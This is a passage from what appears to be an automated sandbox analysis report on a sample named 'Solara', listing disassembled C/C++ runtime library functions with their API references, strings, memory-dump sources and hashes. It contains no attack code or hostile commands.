Opcode Fuzzy Hash: 6906ee6341b37490987d9ee807ebd1d4037180026302d19978e623f016f1373d
Instruction Fuzzy Hash: C001F732900234BBDB19FB54F8158ADB769DF90360F244109F81197690DF309F829790

Function 00C266B7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C266BE
std::_Lockit::_Lockit.LIBCPMT ref: 00C266C9
std::_Lockit::~_Lockit.LIBCPMT ref: 00C26737

Part of subcall function 00C2684A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00C26862

std::locale::_Setgloballocale.LIBCPMT ref: 00C266E4
_Yarn.LIBCPMT ref: 00C266FA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: d34dc8d0687e1e878d598905efe33937f23d7cec9e28f2020d84ee14e68d5237
Instruction ID: 16ac2eab54464eb21dfd92f90831aab69611e7f6ae942c77681730fc01028fb5
Opcode Fuzzy Hash: d34dc8d0687e1e878d598905efe33937f23d7cec9e28f2020d84ee14e68d5237
Instruction Fuzzy Hash: 7401DF79A002619BCB09EF20E846ABD7B71FF85754B04805DE9115B781CF346E43DFA1

Function 00C83E35 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00C83FB5
__freea.LIBCMT ref: 00C83FD1

Strings

am/pm, xrefs: 00C84035
a/p, xrefs: 00C84099

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __freea
String ID: a/p$am/pm
API String ID: 240046367-3206640213
Opcode ID: fdfeb5e1654b8ab8a91f4f87da5d695cf2769b3d58e00125a81c5c5012edd55c
Instruction ID: ac70c6db35b0cc02435af2f35a65ab3bc98cc312070084d462418eb7732a81e9
Opcode Fuzzy Hash: fdfeb5e1654b8ab8a91f4f87da5d695cf2769b3d58e00125a81c5c5012edd55c
Instruction Fuzzy Hash: 69C1F575904217DBCB28BFA9C889BBAB7B0FF15708F144189F921AB250D3359F41CB99

Function 00C550DB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00C55100
CatchIt.LIBVCRUNTIME ref: 00C551E6

Strings

RCC, xrefs: 00C5511A
MOC, xrefs: 00C55112

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: c7baf4456ac9afced228af9a1674e310aa53e44d86d227902d0edc8fc43ceca7
Instruction ID: bd8dd578763678ef63fcac01854973f8624fdf1fce9ced65acc470de4403c70a
Opcode Fuzzy Hash: c7baf4456ac9afced228af9a1674e310aa53e44d86d227902d0edc8fc43ceca7
Instruction Fuzzy Hash: BA417935900609EFCF15CF98CC81AAEBBB5FF48305F158059FD2567221D3359A94DB54

Function 00C41519 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C41520

Part of subcall function 00C398E0: _Maklocstr.LIBCPMT ref: 00C39900
Part of subcall function 00C398E0: _Maklocstr.LIBCPMT ref: 00C3991D
Part of subcall function 00C398E0: _Maklocstr.LIBCPMT ref: 00C3993A

_Mpunct.LIBCPMT ref: 00C415B8
_Mpunct.LIBCPMT ref: 00C415D2

Strings

$+xv, xrefs: 00C415DD

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Maklocstr$Mpunct$H_prolog3
String ID: $+xv
API String ID: 4259326447-1686923651
Opcode ID: 4a36a1726eb8516d304ea06af718665f2847c78287ee958edd3cbde456da2458
Instruction ID: 9229b4e7423ce4416d0a7ee884f630f1ec1c27dded473b719574eadbd665b655
Opcode Fuzzy Hash: 4a36a1726eb8516d304ea06af718665f2847c78287ee958edd3cbde456da2458
Instruction Fuzzy Hash: 972182B1904B556EDB25DF74C840B6BBBF8BB0D300F04495AE899C7A41D770E645DB90

Function 00C4BEBC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C4BEC3
_Mpunct.LIBCPMT ref: 00C4BF5B
_Mpunct.LIBCPMT ref: 00C4BF75

Strings

$+xv, xrefs: 00C4BF80

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: 6e44c7fe0423558a6dc6e1d3e966baf75f6621292fdd1c481d5f47b569d1ea96
Instruction ID: 3edb7687048cfd31cb4e0e3c4cb69086ff18bd1ce70bfe244705f5057e3ca40d
Opcode Fuzzy Hash: 6e44c7fe0423558a6dc6e1d3e966baf75f6621292fdd1c481d5f47b569d1ea96
Instruction Fuzzy Hash: 902180B1904B56AEDB25DFB4C88076BBAF8BB09301F04465AE459C7A41D770EA06DF90

Function 00C50F07 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 00C50F9B

Strings

MOC, xrefs: 00C50F19
RCC, xrefs: 00C50F11
csm, xrefs: 00C50F21

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: ee2ef3ddf6544d97f2b3c80ea289228456547011f157376468e3f91d248d0109
Instruction ID: 860f509af8e1460b6b406a4ec6c0bd3de7876aac35add530b7b3aa37a123fb8e
Opcode Fuzzy Hash: ee2ef3ddf6544d97f2b3c80ea289228456547011f157376468e3f91d248d0109
Instruction Fuzzy Hash: 44110839114205DFC728EF98C402A9AB7E8EF00316F250199EC44CB261D774EEC4DBD9

Function 00C399D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C3F5D4: _Yarn.LIBCPMT ref: 00C3F5E7

_Maklocstr.LIBCPMT ref: 00C39A10

Part of subcall function 00C41306: _Yarn.LIBCPMT ref: 00C41319

_Maklocstr.LIBCPMT ref: 00C39A29

Part of subcall function 00C39BE2: Concurrency::cancel_current_task.LIBCPMT ref: 00C39C84

_Maklocstr.LIBCPMT ref: 00C39A38

Strings

:AM:am:PM:pm, xrefs: 00C39A30

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Maklocstr$Yarn$Concurrency::cancel_current_task
String ID: :AM:am:PM:pm
API String ID: 3924990383-1966799564
Opcode ID: 66a299738eaa3c5865efca21e65a018b31588c891db1021e930bb5bd7617c727
Instruction ID: 398a9d6ec0bcb4376b8133ea243f55aa1fe9cfacb9365d02bff45271db8eacde
Opcode Fuzzy Hash: 66a299738eaa3c5865efca21e65a018b31588c891db1021e930bb5bd7617c727
Instruction Fuzzy Hash: D101A7B2D002087BDB10AFB4BC86D9FB7BCEB81754F10442AF545AB141DBB4AD059760

Function 00C5CF87 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C5CE84,00000000,?,00D11604,?,?,?,00C5D0DB,00000004,InitializeCriticalSectionEx,00CAC694,InitializeCriticalSectionEx), ref: 00C5CF94
GetLastError.KERNEL32(?,00C5CE84,00000000,?,00D11604,?,?,?,00C5D0DB,00000004,InitializeCriticalSectionEx,00CAC694,InitializeCriticalSectionEx,00000000,?,00C55C9D), ref: 00C5CF9E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C5CFC6

Strings

api-ms-, xrefs: 00C5CFAB

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: dff0674cea24bc4f2b3ed264d9288f3d4f714543d98f9ad8a9ccbe779db3e7f4
Instruction ID: 822be5560bddd7221e6180bf4e0141294ba04c881cd038d771a38970f7400761
Opcode Fuzzy Hash: dff0674cea24bc4f2b3ed264d9288f3d4f714543d98f9ad8a9ccbe779db3e7f4
Instruction Fuzzy Hash: 86E01A31384308BAEB201BA0ED4AB5C3A6BAB16B89F100020FA0CA80E1D7719A54D649

Function 00C8EB15 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(18400EB0,00000000,00000000,74DEF550), ref: 00C8EB78

Part of subcall function 00C93E4B: WideCharToMultiByte.KERNEL32(00C79714,00000000,00000000,00000000,00000000,00000000,000000FF,0000FDE9,00000000,00000000,00000000,?,00C91CB6,00000000,00000000,00C79714), ref: 00C93EF7

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8EDD3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C8EE1B
GetLastError.KERNEL32 ref: 00C8EEBE

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 2f30783d7b479e25c343c329e800c27a24b438b5869ef8210c7ff05300984414
Instruction ID: 4a3cfab51c5f019ac1537d899b7e78ac0cfe7852a9ca71648a70d36fd0c9bedf
Opcode Fuzzy Hash: 2f30783d7b479e25c343c329e800c27a24b438b5869ef8210c7ff05300984414
Instruction Fuzzy Hash: 92D15BB5D00258AFCF15DFA8D880AEEBBB5FF09308F18452AE865E7351D730A946CB54

Function 00C58DAE Relevance: 6.2, APIs: 4, Instructions: 192COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C58DB5
UnDecorator::getSymbolName.LIBCMT ref: 00C58E47
DName::operator+.LIBCMT ref: 00C58F4B
DName::DName.LIBVCRUNTIME ref: 00C58FEE

Part of subcall function 00C567BE: shared_ptr.LIBCMT ref: 00C567DA

Part of subcall function 00C56A58: DName::DName.LIBVCRUNTIME ref: 00C56AA6

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
String ID:
API String ID: 1134295639-0
Opcode ID: db367705d8a7c24025e20780d4e22b2e16950bb6b47b10beab9720d4827e4a19
Instruction ID: 1f3ae55cf48194115b7568efb7f944b04e847e4100e36478f76f007bf0f995ee
Opcode Fuzzy Hash: db367705d8a7c24025e20780d4e22b2e16950bb6b47b10beab9720d4827e4a19
Instruction Fuzzy Hash: 9D715C7DC002199FDB10DFE4D881AEDBBB5AB0C312F18411AED15BB251DB359A8DCB68

Function 00C5943D Relevance: 6.2, APIs: 4, Instructions: 169COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C59571

Part of subcall function 00C5640D: __aulldvrm.LIBCMT ref: 00C5643E

DName::operator+.LIBCMT ref: 00C594D2
DName::operator=.LIBVCRUNTIME ref: 00C595B6
DName::DName.LIBVCRUNTIME ref: 00C595E8

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=__aulldvrm
String ID:
API String ID: 2973644308-0
Opcode ID: 1c331f1df1ff84406c8e9c4edc31fe4a1ed61f1e754b2d19fa516586527f4ce7
Instruction ID: f4e7e560aa5a4b2c846f897978e51c43c1bdcebcb338ab820ea7f7a7a6c7cc1a
Opcode Fuzzy Hash: 1c331f1df1ff84406c8e9c4edc31fe4a1ed61f1e754b2d19fa516586527f4ce7
Instruction Fuzzy Hash: 006171BC900215EFCB05CF94D8819EDBBB4FB09301F54829AED11AB351DB719A89DF94

Function 00C54ADF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00C54BA6
___AdjustPointer.LIBCMT ref: 00C54BC9
___AdjustPointer.LIBCMT ref: 00C54C65

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9732d81c7b5ec58b23fa43833a74352f42b0236d75f7c5aa85310518b3e1793e
Instruction ID: a837298a1f0e59d67c857f65038b8bb0f3ea8256e9c2fbfb948e8994f0c33f46
Opcode Fuzzy Hash: 9732d81c7b5ec58b23fa43833a74352f42b0236d75f7c5aa85310518b3e1793e
Instruction Fuzzy Hash: 7E51D079602606AFDB2D8F15C841BBA73A4FF4031AF24442DEC1687291D731EDC9D758

Function 00C5916E Relevance: 6.1, APIs: 4, Instructions: 131COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBCMT ref: 00C591A1

Part of subcall function 00C56782: DName::operator+=.LIBCMT ref: 00C56798

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Name::operator+Name::operator+=
String ID:
API String ID: 382699925-0
Opcode ID: 3097359a5c3aae91154306058e3d2360636c637282c4335bc48baa7833f4fa16
Instruction ID: 40132a2cf9085e8657d6d3458ddfbe1bc80c8c30202f6ca29b995f84f9285205
Opcode Fuzzy Hash: 3097359a5c3aae91154306058e3d2360636c637282c4335bc48baa7833f4fa16
Instruction Fuzzy Hash: 6F414FB9D0020AEACF04CFA5D9859EEBBB8FB05305F104159E915E7250D7719BC8DB98

Function 00C2C200 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2C207

Part of subcall function 00C266B7: __EH_prolog3.LIBCMT ref: 00C266BE
Part of subcall function 00C266B7: std::_Lockit::_Lockit.LIBCPMT ref: 00C266C9
Part of subcall function 00C266B7: std::locale::_Setgloballocale.LIBCPMT ref: 00C266E4
Part of subcall function 00C266B7: _Yarn.LIBCPMT ref: 00C266FA
Part of subcall function 00C266B7: std::_Lockit::~_Lockit.LIBCPMT ref: 00C26737

std::_Lockit::_Lockit.LIBCPMT ref: 00C2C22B
std::locale::_Setgloballocale.LIBCPMT ref: 00C2C27A
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2C2DA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocalestd::locale::_$Yarn
String ID:
API String ID: 2301162320-0
Opcode ID: 111e36ff53e2894795a3f89cc3ba03265a78bfcb70ff05b4cc2a73c450438a29
Instruction ID: 26a0caeec93bdbac916dbc6a57a923a7275c6da8b01e47cfc3244608fc3ca274
Opcode Fuzzy Hash: 111e36ff53e2894795a3f89cc3ba03265a78bfcb70ff05b4cc2a73c450438a29
Instruction Fuzzy Hash: 4B215C35A00225DFDF04EFA8E8C1A6E77A4EF59310B054069E916DB792DF34EE41DB90

Function 00C95052 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00C93E4B: WideCharToMultiByte.KERNEL32(00C79714,00000000,00000000,00000000,00000000,00000000,000000FF,0000FDE9,00000000,00000000,00000000,?,00C91CB6,00000000,00000000,00C79714), ref: 00C93EF7

GetLastError.KERNEL32 ref: 00C950B6
__dosmaperr.LIBCMT ref: 00C950BD
GetLastError.KERNEL32(?,?,?,?), ref: 00C950F7
__dosmaperr.LIBCMT ref: 00C950FE

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: d8e570d2d64cbe41197706e0bc8515d4cae2d600236ab448def282e9c76dd330
Instruction ID: 9833e8e1074412fa0bbcc4e293c6882666ebc6cd0bc7e5b12628792fb49e6968
Opcode Fuzzy Hash: d8e570d2d64cbe41197706e0bc8515d4cae2d600236ab448def282e9c76dd330
Instruction Fuzzy Hash: 8921D471604A0AAFCF22AF71CC89A2FB7A8FF053647108518F92997241D731EE1097A0

Function 00C82B6B Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fabab3d588119dd860cc0b204ab68644ed1ea7db827feb7511818860bcd23996
Instruction ID: ad6d329a35b60ca182ac4f4189cd94fb65204b387fe672fa70e7e23b7f243728
Opcode Fuzzy Hash: fabab3d588119dd860cc0b204ab68644ed1ea7db827feb7511818860bcd23996
Instruction Fuzzy Hash: 2421A171205209AFDB21BF61DC4997EB7A8FF0436C7104A19F929D7140DB31ED10D7A4

Function 00C96DA8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00C96DB0

